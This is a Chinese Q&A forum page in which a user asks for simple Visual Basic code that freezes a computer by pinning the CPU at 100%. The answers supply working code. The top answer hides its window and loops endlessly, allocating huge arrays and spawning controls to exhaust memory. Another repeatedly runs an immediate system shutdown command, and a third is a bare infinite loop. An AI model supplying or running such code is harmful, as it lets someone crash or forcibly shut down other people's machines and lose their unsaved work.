VB 让系统死机的程序

谁能够给我一个用 VB 实现 系统死循环的程序代码,让CPU占用率一直是100%,我不是做坏事,只是我个人有需要这样的代码。越简单越好,语句别过于复杂

好评回答
    这个代码仅供参考
    1.在窗体上添加一个picturebox控件和1个timer控件并且把他们都设置为控件组(把控件复制粘贴一次就可以)
    2.代码如下:
    Private Sub Form_Load()
        Me.Hide
        Dim i As Long
        i = 1
        Dim arry(i, i, i) As String * 65535
        While True
            On Error Resume Next
            ReDim arry(i, i, i) As String * 65535
            Load Timer1(i)
            Load Picture1(i)
            Picture1(i).PSet (i, i)
            i = i + 1
        Wend
    End Sub

    惠***

其他答案

  • Private Sub Form_load()
    for i =1 to 1E+40
      Shell "shutdown -s -t 0"
    Next i
    End sub
    用这个试试...

    X***

  • Private Sub Form_load()
    dim i as integer
    do while i<2
       i=1
    loop
    End sub

    V***